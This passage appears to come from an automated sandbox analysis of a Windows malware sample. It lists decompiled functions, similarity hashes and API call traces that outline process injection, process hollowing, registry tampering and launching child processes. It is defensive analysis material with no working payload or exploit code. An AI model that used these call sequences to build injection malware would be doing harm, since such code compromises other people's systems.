    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
